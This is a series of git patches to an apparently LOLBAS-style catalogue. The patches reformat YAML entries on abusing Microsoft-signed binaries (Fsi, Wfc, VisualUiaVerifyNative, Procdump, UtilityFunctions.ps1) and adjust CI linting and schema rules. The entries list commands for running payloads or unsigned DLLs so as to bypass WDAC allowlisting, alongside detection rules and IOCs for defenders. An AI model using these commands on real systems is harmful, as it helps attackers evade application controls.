b/yml/OtherMSBinaries/Fsi.yml @@ -1,38 +1,38 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index ce3205e..7e8d513 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -1,35 +1,35 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Full_Path: - - Path: no default -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Person: Alfie Champion - Handle: '@ajpc500' +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: '2020-10-14' +Commands: + - Command: procdump.exe -md calc.dll explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Person: Alfie Champion + Handle: '@ajpc500' diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index 4afb3a5..b2d3380 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -1,30 +1,30 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 2d084c7..b9de32f 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -1,27 +1,27 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' From 2c3653f0c4789e462d53afb0040a9e25049f8049 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 01:36:14 -0400 Subject: [PATCH 49/60] Fixing more file formatting issues. --- yml/OSScripts/UtilityFunctions.yml | 48 ++++++++++----------- yml/OtherMSBinaries/FsiAnyCpu.yml | 68 +++++++++++++++--------------- 2 files changed, 58 insertions(+), 58 deletions(-) diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index ee53be2..800938c 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -1,24 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 35cc6c3..0a81660 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -1,34 +1,34 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' From 43b48f57acd3c625fb6e76c485b8614972fba93e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 12:58:54 -0400 Subject: [PATCH 50/60] Making final changes to workflows. --- .github/workflows/yaml-lint-reviewdog.yml | 27 ++++++++++++++++++----- .github/workflows/yaml-linting.yml | 2 +- 2 files changed, 23 insertions(+), 6 deletions(-) diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml index 3cd1dd7..ef3ba33 100644 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -1,9 +1,6 @@ --- -name: YAML Lint with reviewdog -on: - pull_request: - branches: - - master +name: PULL_REQUEST: YAML Lint with Reviewdog & Schema Checks +on: [pull_request] jobs: lintFiles: @@ -15,3 +12,23 @@ jobs: with: reporter: github-pr-review # Change reporter. yamllint_flags: '--config-file .github/.yamllint' + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5782c37..1f0eec8 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,5 +1,5 @@ --- -name: YAML Lint and Validation Push Check +name: PUSH: YAML Lint and Schema Validation Checks on: [push] jobs: From 9aaa4903e93fec90b1ed889993d6f5454145e5cf Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:02:20 -0400 Subject: [PATCH 51/60] Fixing issue with colons. --- .github/workflows/yaml-lint-reviewdog.yml | 2 +- .github/workflows/yaml-linting.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml index ef3ba33..b38f5ce 100644 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -1,5 +1,5 @@ --- -name: PULL_REQUEST: YAML Lint with Reviewdog & Schema Checks +name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks on: [pull_request] jobs: diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 1f0eec8..cf3a72e 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,5 +1,5 @@ --- -name: PUSH: YAML Lint and Schema Validation Checks +name: PUSH - YAML Lint and Schema Validation Checks on: [push] jobs: From 9712ff088acc05b88d1bf180d71855b27b4dd053 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:16:56 -0400 Subject: [PATCH 52/60] Adding path to reviewdog yamllint --- .github/workflows/yaml-lint-reviewdog.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml index b38f5ce..59dbab8 100644 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -11,7 +11,7 @@ jobs: uses: reviewdog/action-yamllint@v1 with: reporter: github-pr-review # Change reporter. - yamllint_flags: '--config-file .github/.yamllint' + yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix with: From e10341af15bda2d4fa2f98557084b3d76d414710 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:20:35 -0400 Subject: [PATCH 53/60] Setting level to error for reviewdog linting. --- .github/workflows/yaml-lint-reviewdog.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml index 59dbab8..500f25c 100644 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -10,6 +10,7 @@ jobs: - name: Run yamllint uses: reviewdog/action-yamllint@v1 with: + level: error reporter: github-pr-review # Change reporter. yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' - name: Validate OSBinaries YAML Schema From 396cd47710320adf4077db71881f53a8f8d11b5a Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:25:58 -0400 Subject: [PATCH 54/60] Removing reviewdog yamllint that does not appear to work and falling back to normal yamllint. --- .github/workflows/yaml-lint-reviewdog.yml | 35 ----------------------- .github/workflows/yaml-linting.yml | 4 +-- 2 files changed, 2 insertions(+), 37 deletions(-) delete mode 100644 .github/workflows/yaml-lint-reviewdog.yml diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml deleted file mode 100644 index 500f25c..0000000 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ /dev/null @@ -1,35 +0,0 @@ ---- -name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks -on: [pull_request] - -jobs: - lintFiles: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Run yamllint - uses: reviewdog/action-yamllint@v1 - with: - level: error - reporter: github-pr-review # Change reporter. - yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index cf3a72e..70d7678 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,6 +1,6 @@ --- -name: PUSH - YAML Lint and Schema Validation Checks -on: [push] +name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks +on: [push,pull_request] jobs: lintFiles: From 92424a40def6c55a57add347c2470561db73608a Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 22:51:52 -0400 Subject: [PATCH 55/60] Implimenting requested changes from PR #251 review from @wietze. --- .github/yaml-lint-reviewdog.yml.bak | 35 +++++++++++++++++++++++++++ YML-Schema.yml | 15 ++++++------ yml/OSBinaries/.AppInstaller.yml.swp | Bin 12288 -> 0 bytes 3 files changed, 43 insertions(+), 7 deletions(-) create mode 100644 .github/yaml-lint-reviewdog.yml.bak delete mode 100644 yml/OSBinaries/.AppInstaller.yml.swp diff --git a/.github/yaml-lint-reviewdog.yml.bak b/.github/yaml-lint-reviewdog.yml.bak new file mode 100644 index 0000000..500f25c --- /dev/null +++ b/.github/yaml-lint-reviewdog.yml.bak @@ -0,0 +1,35 @@ +--- +name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks +on: [pull_request] + +jobs: + lintFiles: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Run yamllint + uses: reviewdog/action-yamllint@v1 + with: + level: error + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml' + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml diff --git a/YML-Schema.yml b/YML-Schema.yml index 6c939cd..363b279 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -43,7 +43,7 @@ mapping: "MitreID": type: str required: true - pattern: 'T[0-9]{4}' + pattern: '^T[0-9]{4}(\.[0-9]{3})?$' "OperatingSystem": type: str required: true @@ -74,19 +74,19 @@ mapping: type: str "Sigma": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Analysis": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Elastic": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Splunk": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "BlockRule": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Resources": type: seq required: false @@ -95,7 +95,7 @@ mapping: mapping: "Link": type: str - pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' "Acknowledgement": type: seq required: false @@ -106,3 +106,4 @@ mapping: type: str "Handle": type: str + pattern: '^@(\w){1,15}$' diff --git a/yml/OSBinaries/.AppInstaller.yml.swp b/yml/OSBinaries/.AppInstaller.yml.swp deleted file mode 100644 index 